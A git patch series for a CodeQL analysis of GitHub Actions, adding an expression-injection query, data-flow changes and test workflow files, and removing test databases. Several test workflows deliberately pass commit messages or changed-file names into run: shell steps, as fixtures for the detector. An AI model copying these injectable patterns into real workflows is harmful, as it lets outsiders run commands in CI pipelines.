zyUM2rb*sJ2f0fL5u3(%Q5_PjAHz+qmGr^lY{2oe?39in9*jVIC0!V8~wQDN^2>ynM zy$2&}R^(CRbS56Lr1de1U%sYC<`E08@P{s~x>3f*T;I|9x)Y47^e!PQGxe_1vm|wi zb4$N_v@O(XE<5{WmIzv1+7Z&i7kB42ZWOGYb3x-%dU93CdT735FUBS2*P-Ps)=2wm zM)50TTmFfn0hpjaDABSoHti&64$R>kVNKRrW;2?|=KbG|vb~(EajfD;$B8>eN*?qce$ue!L(J+@SJcsb!3LQK2&|CQ38rj9$My9!!WL8M7K2DVLhA zSHeZ$_miDJgeu@rV=2`E4`4*6+IZckS!lPs8`^&Ymb827AY2lsEW;u$m@0PgrzWnR z<`F+XIW?JY;M#PU_2B)Kn_@QqY5)GZJsTL}t8nbGkmiaBxiBD;>qx$D`+~238nQ0h zaQ0EJH=L^bL-{6)K6o0m3*?rv^pObUHz{yS3n9NvtUa3fEWg-iQL2NM!zq;v92kgeCd_Oa$Z2Xx)n=E4=#)}}a*w7AZFMEF=}qop6) za0L9AouzYg%1HQ}>K$v5(#jyc`WRW?<9tpn3C!|jR zNaAL1osGGZI}M1W>$WD{Bo8jhChyDekBPhiC92@lAf5TjO5i=@ikX8=lgk2{Heh%O zR9K?BeN>{LbmxgpX+q+|Qt8-QT5dM*%|>*{gy9R>;=xftjm-tdIc2BV; z-O9&+8>eCsiLz~Pq+%>5%y6BYNyKtJ=8$#+>+qZyg zTx01;?Jbr*$VUX>PK}fB5BQ6yN~#qNRQ~GWXXoxo8r(Iryl97ZIn>ujcv3Y6x_x+Y zQA$O=^tA+Q5<2PDlEbaWOc}#$f=L%cu-d>>&o*7j9X>q76n|K#ty|j8I-=^-r@kJX z0=N@eVXe20T1U`mQ=J@m=}$tJwN9xMqL8a@GhqyeZ!XI zei0gIM00*jBIy)G2jAaso_FZtBjf7nw%O>C%zmG|3wqhn+2$sllbcGRB`@jL^EG;J z`n}cVWRV(VXQ#Oi?_=eaJ-O+Y5s7?I#> "$GITHUB_OUTPUT" + - id: sink + run: | + echo "echo ${{steps.no-step.outputs.foo}}" + + diff --git a/ql/src/test/no-flow2.yml b/ql/src/test/no-flow2.yml new file mode 100644 index 000000000000..429d4650b60d --- /dev/null +++ b/ql/src/test/no-flow2.yml @@ -0,0 +1,37 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: 'foobarfoo' + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + + diff --git a/ql/src/test/simple1.yml b/ql/src/test/simple1.yml new file mode 100644 index 000000000000..f61e763f1881 --- /dev/null +++ b/ql/src/test/simple1.yml @@ -0,0 +1,16 @@ +on: push + +jobs: + simple1: + runs-on: ubuntu-latest + + steps: + - id: source + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event.head_commit.message }} + find: 'foo' + replace: '' + - id: sink + run: | + echo "${{steps.source.outputs.value}}" diff --git a/ql/src/test/simple2.yml b/ql/src/test/simple2.yml new file mode 100644 index 000000000000..f3d79b97bc2d --- /dev/null +++ b/ql/src/test/simple2.yml @@ -0,0 +1,36 @@ +name: CI + +on: + pull_request: + branches: + - main + +jobs: + changed_files: + runs-on: ubuntu-latest + name: Test changed-files + steps: + - uses: actions/checkout@v4 + with: + fetch-depth: 0 + + - name: Get changed files + id: source + uses: tj-actions/changed-files@v40 + + - name: Remove foo from changed files + id: step + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ steps.source.outputs.all_changed_files }} + find: 'foo' + replace: '' + + - name: List all changed files + id: sink + run: | + for file in ${{ steps.step.outputs.value }}; do + echo "$file was changed" + done + + diff --git a/ql/src/test/test.ql b/ql/src/test/test.ql new file mode 100644 index 000000000000..f8d6e0c804b6 --- /dev/null +++ b/ql/src/test/test.ql @@ -0,0 +1,37 @@ +/** + * @name Expression injection in Actions + * @description Using user-controlled GitHub Actions contexts like `run:` or `script:` may allow a malicious + * user to inject code into the GitHub action. + * @kind path-problem + * @problem.severity warning + * @security-severity 9.3 + * @precision high + * @id actions/command-injection + * @tags actions + * security + * external/cwe/cwe-094 + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources + +private class ExpressionInjectionSink extends DataFlow::Node { + ExpressionInjectionSink() { exists(RunExpr e | e.getScriptExpr() = this.asExpr()) } +} + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } + + predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } +} + +module MyFlow = TaintTracking::Global; + +import MyFlow::PathGraph + +from MyFlow::PathNode source, MyFlow::PathNode sink +where MyFlow::flowPath(source, sink) +select sink.getNode(), source, sink, + "Potential injection from the ${{ " + sink.getNode().asExpr().(ExprAccessExpr).getExpression() + + " }}, which may be controlled by an external user." diff --git a/ql/src/test/test.yml b/ql/src/test/test.yml new file mode 100644 index 000000000000..8f9cbf3b6440 --- /dev/null +++ b/ql/src/test/test.yml @@ -0,0 +1,35 @@ +on: push + +jobs: + job1: + runs-on: ubuntu-latest + + outputs: + job_output: ${{ steps.step2.outputs.test }} + + steps: + - uses: actions/checkout@v4 + - id: step0 + uses: mad9000/actions-find-and-replace-string@3 + with: + source: ${{ github.event.head_commit.message }} + find: 'foo' + replace: '' + - id: step1 + env: + BODY: ${{ steps.step0.outputs.value}} + run: | + Write-Output "::set-output name=MSG::$ENV{BODY}" + - id: step2 + run: echo "test=${{steps.step1.outputs.MSG}}" >> "$GITHUB_OUTPUT" + + job2: + runs-on: ubuntu-latest + + if: ${{ always() }} + + needs: job1 + + steps: + - env: + run: echo ${{needs.job1.outputs.job_output}} From 355ccf42ee38d6855833e3042ebca3de0f596147 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:44:37 +0100 Subject: [PATCH 003/707] Do not compress local flow steps Use `neverSkipPathGrap` to `any()` so no local flow steps get pruned and thrown away in order to compress the presented dataflow path. --- .../internal/DataFlowImplSpecific.qll | 5 +++- .../dataflow/internal/DataFlowPrivate.qll | 28 +++++-------------- .../Security/CWE-094/ExpressionInjection.ql | 1 + 3 files changed, 12 insertions(+), 22 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll index 4abb455b0ddc..2d3b9696ef65 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowImplSpecific.qll @@ -6,6 +6,9 @@ private import codeql.dataflow.DataFlow module ActionsDataFlow implements InputSig { - import DataFlowPrivate + import DataFlowPrivate as Private import DataFlowPublic + import Private + + predicate neverSkipInPathGraph = Private::neverSkipInPathGraph/1; } diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index b4abb3e8aa5f..8b57ea2436eb 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll @@ -207,27 +207,6 @@ predicate stepOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } -predicate test1(UsesExpr u, string f, JobStmt j) { - u.getLocation().getFile().getBaseName() = "inter1.yml" and - f = u.getId() and - j = u.getJob() -} - -predicate test2(StepOutputAccessExpr r, string f, JobStmt j) { - r.getLocation().getFile().getBaseName() = "inter1.yml" and - f = r.getStepId() and - j = r.getJob() -} - -predicate test3(UsesExpr u, StepOutputAccessExpr r, Node n) { - r.getLocation().getFile().getBaseName() = "inter1.yml" and - u.getLocation().getFile().getBaseName() = "inter1.yml" and - u.getId() = r.getStepId() and - u.getJob() = r.getJob() and - // el SOAE has no mapping DF NODE - n.asExpr() = r -} - predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is a JobOutputAccessExpr and nodeFrom is the Job output expression exists(Expression astFrom, JobOutputAccessExpr astTo | @@ -310,3 +289,10 @@ predicate lambdaCall(DataFlowCall call, LambdaCallKind kind, Node receiver) { no /** Extra data-flow steps needed for lambda flow analysis. */ predicate additionalLambdaFlowStep(Node nodeFrom, Node nodeTo, boolean preservesValue) { none() } + +/** + * Since our model is so simple, we dont want to compress the local flow steps. + * This compression is normally done to not show SSA steps, casts, etc. + */ +predicate neverSkipInPathGraph(Node node) { any() } + diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index f8d6e0c804b6..4af1e2c286a6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql @@ -24,6 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + //predicate neverSkip(DataFlow::Node node) { any() } } module MyFlow = TaintTracking::Global; From 093b1a22110b2573befe6dd8c7662ce863038a34 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 5 Feb 2024 10:45:52 +0100 Subject: [PATCH 004/707] Remove test dbs --- ql/lib/test-db/baseline-info.json | 1 - ql/lib/test-db/codeql-database.yml | 10 - ql/lib/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 24 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 32 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 24 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 1080 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 544 -> 0 bytes .../db-yaml/default/cache/pages/01.pack | Bin 118 -> 0 bytes .../db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes .../db-yaml/default/cache/pages/0d.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/15.pack | Bin 131 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack.d | Bin 85 -> 0 bytes .../db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes .../db-yaml/default/cache/pages/34.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/34.pack.d | Bin 865 -> 0 bytes .../db-yaml/default/cache/pages/37.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/37.pack.d | Bin 163 -> 0 bytes .../db-yaml/default/cache/pages/43.pack | Bin 368 -> 0 bytes .../db-yaml/default/cache/pages/54.pack | Bin 229 -> 0 bytes .../db-yaml/default/cache/pages/55.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/55.pack.d | Bin 140 -> 0 bytes .../db-yaml/default/cache/pages/9c.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/9c.pack.d | Bin 1086 -> 0 bytes .../db-yaml/default/cache/pages/a1.pack | Bin 99 -> 0 bytes .../db-yaml/default/cache/pages/b4.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/b4.pack.d | Bin 156 -> 0 bytes .../db-yaml/default/cache/pages/b7.pack | Bin 282 -> 0 bytes .../db-yaml/default/cache/pages/b9.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/bc.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/bc.pack.d | Bin 596 -> 0 bytes .../db-yaml/default/cache/pages/c0.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/c3.pack | Bin 115 -> 0 bytes .../db-yaml/default/cache/pages/e0.pack | Bin 92 -> 0 bytes .../db-yaml/default/cache/pages/f3.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/pages/fc.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/predicates/02.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/predicates/03.pack | Bin 144 -> 0 bytes .../db-yaml/default/cache/predicates/06.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/09.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/10.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/24.pack | Bin 136 -> 0 bytes .../db-yaml/default/cache/predicates/26.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/2d.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/predicates/2e.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/2f.pack | Bin 152 -> 0 bytes .../db-yaml/default/cache/predicates/3b.pack | Bin 151 -> 0 bytes .../db-yaml/default/cache/predicates/3c.pack | Bin 170 -> 0 bytes .../db-yaml/default/cache/predicates/53.pack | Bin 141 -> 0 bytes .../db-yaml/default/cache/predicates/5a.pack | Bin 140 -> 0 bytes .../db-yaml/default/cache/predicates/60.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/6f.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/75.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/7c.pack | Bin 161 -> 0 bytes .../db-yaml/default/cache/predicates/86.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/99.pack | Bin 141 -> 0 bytes .../db-yaml/default/cache/predicates/a1.pack | Bin 146 -> 0 bytes .../db-yaml/default/cache/predicates/a2.pack | Bin 144 -> 0 bytes .../db-yaml/default/cache/predicates/a8.pack | Bin 145 -> 0 bytes .../db-yaml/default/cache/predicates/bf.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/c5.pack | Bin 157 -> 0 bytes .../db-yaml/default/cache/predicates/d2.pack | Bin 148 -> 0 bytes .../db-yaml/default/cache/predicates/d4.pack | Bin 170 -> 0 bytes .../db-yaml/default/cache/predicates/e3.pack | Bin 169 -> 0 bytes .../db-yaml/default/cache/predicates/e4.pack | Bin 147 -> 0 bytes .../db-yaml/default/cache/predicates/f9.pack | Bin 154 -> 0 bytes .../db-yaml/default/cache/relations/06.pack | Bin 289 -> 0 bytes .../db-yaml/default/cache/relations/10.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/11.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/19.pack | Bin 289 -> 0 bytes .../db-yaml/default/cache/relations/1e.pack | Bin 160 -> 0 bytes .../db-yaml/default/cache/relations/2a.pack | Bin 177 -> 0 bytes .../db-yaml/default/cache/relations/2f.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/39.pack | Bin 272 -> 0 bytes .../db-yaml/default/cache/relations/4b.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/56.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/5c.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/6a.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/7c.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/9f.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/a0.pack | Bin 126 -> 0 bytes .../db-yaml/default/cache/relations/ac.pack | Bin 109 -> 0 bytes .../db-yaml/default/cache/relations/bf.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/ca.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/d3.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/e9.pack | Bin 143 -> 0 bytes .../db-yaml/default/cache/relations/f9.pack | Bin 143 -> 0 bytes ql/lib/test-db/db-yaml/default/cache/version | 1 - .../db-yaml/default/containerparent.rel | Bin 80 -> 0 bytes .../default/containerparent.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/default/files.rel | Bin 8 -> 0 bytes .../db-yaml/default/files.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/default/folders.rel | Bin 80 -> 0 bytes .../db-yaml/default/folders.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/locations_default.rel | Bin 1416 -> 0 bytes .../default/locations_default.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/pools/0/buckets/info | Bin 40 -> 0 bytes .../default/pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/0/info | Bin 33 -> 0 bytes .../db-yaml/default/pools/0/metadata/info | Bin 40 -> 0 bytes .../default/pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../db-yaml/default/pools/1/buckets/info | Bin 40 -> 0 bytes .../default/pools/1/buckets/page-000000 | Bin 8192 -> 0 bytes .../test-db/db-yaml/default/pools/1/ids1/info | Bin 40 -> 0 bytes .../db-yaml/default/pools/1/ids1/page-000000 | Bin 8192 -> 0 bytes .../db-yaml/default/pools/1/indices1/info | Bin 40 -> 0 bytes .../default/pools/1/indices1/page-000000 | Bin 8192 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/1/info | Bin 41 -> 0 bytes .../db-yaml/default/pools/1/metadata/info | Bin 40 -> 0 bytes .../default/pools/1/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/pools/1/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/lib/test-db/db-yaml/default/pools/poolInfo | Bin 32 -> 0 bytes .../db-yaml/default/sourceLocationPrefix.rel | Bin 4 -> 0 bytes .../default/sourceLocationPrefix.rel.checksum | Bin 12 -> 0 bytes .../default/strings/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../default/strings/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes ql/lib/test-db/db-yaml/default/yaml.rel | Bin 1416 -> 0 bytes .../test-db/db-yaml/default/yaml.rel.checksum | Bin 12 -> 0 bytes .../db-yaml/default/yaml_locations.rel | Bin 472 -> 0 bytes .../default/yaml_locations.rel.checksum | Bin 12 -> 0 bytes .../test-db/db-yaml/default/yaml_scalars.rel | Bin 552 -> 0 bytes .../db-yaml/default/yaml_scalars.rel.checksum | Bin 12 -> 0 bytes ql/lib/test-db/db-yaml/yaml.dbscheme | 80 ----- ...-diagnostics-add-20240203T091755.518Z.json | 0 ...-diagnostics-add-20240203T091756.033Z.json | 0 .../database-create-20240203.101754.571.log | 275 ----------------- ...tabase-index-files-20240203.101755.239.log | 15 - ql/lib/test-db/src.zip | Bin 578 -> 0 bytes ql/src/test-db/baseline-info.json | 1 - ql/src/test-db/codeql-database.yml | 10 - ql/src/test-db/db-yaml/default/cache/.lock | 0 .../cache/cached-strings/pools/0/buckets/info | Bin 40 -> 0 bytes .../pools/0/buckets/page-000000 | Bin 8192 -> 0 bytes .../cache/cached-strings/pools/0/ids1/info | Bin 40 -> 0 bytes .../cached-strings/pools/0/ids1/page-000000 | Bin 8192 -> 0 bytes .../cached-strings/pools/0/indices1/info | Bin 40 -> 0 bytes .../pools/0/indices1/page-000000 | Bin 8192 -> 0 bytes .../default/cache/cached-strings/pools/0/info | Bin 41 -> 0 bytes .../cached-strings/pools/0/metadata/info | Bin 40 -> 0 bytes .../pools/0/metadata/page-000000 | Bin 8192 -> 0 bytes .../pools/0/pageDump/page-000000000 | Bin 1048592 -> 0 bytes .../cache/cached-strings/pools/poolInfo | Bin 28 -> 0 bytes .../cache/cached-strings/tuple-pool/header | Bin 4 -> 0 bytes ...9--Implementation---Cached--TNode-56603d11 | Bin 16 -> 0 bytes ...mplementation---Cached--TNode-56603d11#0#e | Bin 80 -> 0 bytes ...plementation---Cached--TNode-56603d11#1#eb | Bin 116 -> 0 bytes ...mplementation---Cached--TNode-56603d11#2#e | Bin 80 -> 0 bytes ...lementation---Cached--TNode-56603d11#3#eet | Bin 4776 -> 0 bytes ...-Implementation---Cached--TSplits-cdffdde7 | Bin 16 -> 0 bytes ...plementation---Cached--TSplits-cdffdde7#0# | Bin 12 -> 0 bytes ...ples#Cfg#f90a6699--Completion--TCompletion | Bin 16 -> 0 bytes ...s#Cfg#f90a6699--Completion--TCompletion#0# | Bin 12 -> 0 bytes ...s#Cfg#f90a6699--Completion--TSuccessorType | Bin 16 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#0# | Bin 12 -> 0 bytes ...g#f90a6699--Completion--TSuccessorType#1#b | Bin 24 -> 0 bytes ...fg#f90a6699--Completion--TSuccessorType#2# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-15fd6561 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-15fd6561#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-729b2108 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-729b2108#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-7595a81e | Bin 16 -> 0 bytes ...king#f6f2598d--TaintFlow-7595a81e#0#tttttt | Bin 260 -> 0 bytes ...Tracking#f6f2598d--TaintFlow-7595a81e#1#tt | Bin 68 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-cd159b4d | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-cd159b4d#0# | Bin 12 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-d2947120 | Bin 16 -> 0 bytes ...tTracking#f6f2598d--TaintFlow-d2947120#0#t | Bin 2392 -> 0 bytes ...TaintTracking#f6f2598d--TaintFlow-d8fdd114 | Bin 16 -> 0 bytes ...ntTracking#f6f2598d--TaintFlow-d8fdd114#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TAccessPathFront-12309985 | Bin 16 -> 0 bytes ...low---Cached--TAccessPathFront-12309985#0# | Bin 12 -> 0 bytes ...Flow---Cached--TAccessPathFrontOp-ea156098 | Bin 16 -> 0 bytes ...w---Cached--TAccessPathFrontOp-ea156098#0# | Bin 12 -> 0 bytes ...---Cached--TAccessPathFrontOp-ea156098#1#t | Bin 16 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-0bf03857 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-0bf03857#0# | Bin 12 -> 0 bytes ...---Cached--TApproxAccessPathF-0bf03857#1#t | Bin 16 -> 0 bytes ...Flow---Cached--TApproxAccessPathF-baba9c49 | Bin 16 -> 0 bytes ...w---Cached--TApproxAccessPathF-baba9c49#0# | Bin 12 -> 0 bytes ...DataFlow---Cached--TBooleanOption-dec0af22 | Bin 16 -> 0 bytes ...aFlow---Cached--TBooleanOption-dec0af22#0# | Bin 12 -> 0 bytes ...Flow---Cached--TBooleanOption-dec0af22#1#b | Bin 24 -> 0 bytes ...nsDataFlow---Cached--TCallContext-54d858e5 | Bin 16 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#0# | Bin 12 -> 0 bytes ...ataFlow---Cached--TCallContext-54d858e5#2# | Bin 12 -> 0 bytes ...Flow---Cached--TDataFlowCallOptio-c18bdb95 | Bin 16 -> 0 bytes ...w---Cached--TDataFlowCallOptio-c18bdb95#0# | Bin 12 -> 0 bytes ...---Cached--TDataFlowCallOptio-c18bdb95#1#t | Bin 128 -> 0 bytes ...Flow---Cached--TLocalFlowCallCont-17f4a8f6 | Bin 16 -> 0 bytes ...w---Cached--TLocalFlowCallCont-17f4a8f6#0# | Bin 12 -> 0 bytes ...taFlow---Cached--TParamNodeOption-178d6b8b | Bin 16 -> 0 bytes ...low---Cached--TParamNodeOption-178d6b8b#0# | Bin 12 -> 0 bytes ...ionsDataFlow---Cached--TReturnCtx-f40235df | Bin 16 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#0# | Bin 12 -> 0 bytes ...sDataFlow---Cached--TReturnCtx-f40235df#1# | Bin 12 -> 0 bytes ...DataFlow---Cached--TReturnKindExt-9770a119 | Bin 16 -> 0 bytes ...Flow---Cached--TReturnKindExt-9770a119#0#t | Bin 16 -> 0 bytes ...es#DataFlowPrivate#6a54d7ad--TDataFlowType | Bin 16 -> 0 bytes ...DataFlowPrivate#6a54d7ad--TDataFlowType#0# | Bin 12 -> 0 bytes .../tuples#DataFlowPrivate#6a54d7ad--TNode | Bin 16 -> 0 bytes ...tuples#DataFlowPrivate#6a54d7ad--TNode#0#t | Bin 2392 -> 0 bytes ...ples#DataFlowPrivate#6a54d7ad--TReturnKind | Bin 16 -> 0 bytes ...s#DataFlowPrivate#6a54d7ad--TReturnKind#0# | Bin 12 -> 0 bytes ...#6a54d7ad--DataFlowType---TOption-4fb642c9 | Bin 16 -> 0 bytes ...54d7ad--DataFlowType---TOption-4fb642c9#0# | Bin 12 -> 0 bytes ...ion-Unit#54592529--Unit---TOption-51176e26 | Bin 16 -> 0 bytes ...-Unit#54592529--Unit---TOption-51176e26#0# | Bin 12 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit | Bin 16 -> 0 bytes .../tuple-pool/tuples#Unit#54592529--TUnit#0# | Bin 12 -> 0 bytes .../tuples#printAst#38acf19d--TPrintNode | Bin 16 -> 0 bytes .../tuples#printAst#38acf19d--TPrintNode#0#e | Bin 2672 -> 0 bytes .../db-yaml/default/cache/pages/02.pack | Bin 79 -> 0 bytes .../db-yaml/default/cache/pages/04.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/1f.pack | Bin 125 -> 0 bytes .../db-yaml/default/cache/pages/29.pack | Bin 84 -> 0 bytes .../db-yaml/default/cache/pages/2b.pack | Bin 162 -> 0 bytes .../db-yaml/default/cache/pages/2d.pack | Bin 91 -> 0 bytes .../db-yaml/default/cache/pages/2e.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/2e.pack.d | Bin 316 -> 0 bytes .../db-yaml/default/cache/pages/32.pack | Bin 112 -> 0 bytes .../db-yaml/default/cache/pages/46.pack | Bin 99 -> 0 bytes .../db-yaml/default/cache/pages/4b.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/4b.pack.d | Bin 3805 -> 0 bytes .../db-yaml/default/cache/pages/67.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/67.pack.d | Bin 664 -> 0 bytes .../db-yaml/default/cache/pages/71.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/71.pack.d | Bin 618 -> 0 bytes .../db-yaml/default/cache/pages/82.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/82.pack.d | Bin 354 -> 0 bytes .../db-yaml/default/cache/pages/91.pack | Bin 112 -> 0 bytes .../db-yaml/default/cache/pages/92.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/92.pack.d | Bin 2612 -> 0 bytes .../db-yaml/default/cache/pages/95.pack | Bin 124 -> 0 bytes .../db-yaml/default/cache/pages/99.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/99.pack.d | Bin 1311 -> 0 bytes .../db-yaml/default/cache/pages/a3.pack | Bin 149 -> 0 bytes .../db-yaml/default/cache/pages/a3.pack.d | Bin 797 -> 0 bytes .../db-yaml/default/cache/pages/a4.pack | Bin 106 -> 0 bytes .../db-yaml/default/cache/pages/ab.pack | Bin 119 -> 0 bytes .../db-yaml/default/cache/pages/b6.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/b6.pack.d | Bin 324 -> 0 bytes .../db-yaml/default/cache/pages/bd.pack | Bin 89 -> 0 bytes .../db-yaml/default/cache/pages/ce.pack | Bin 173 -> 0 bytes .../db-yaml/default/cache/pages/d0.pack | Bin 85 -> 0 bytes .../db-yaml/default/cache/pages/de.pack | Bin 65 -> 0 bytes .../db-yaml/default/cache/pages/de.pack.d | Bin 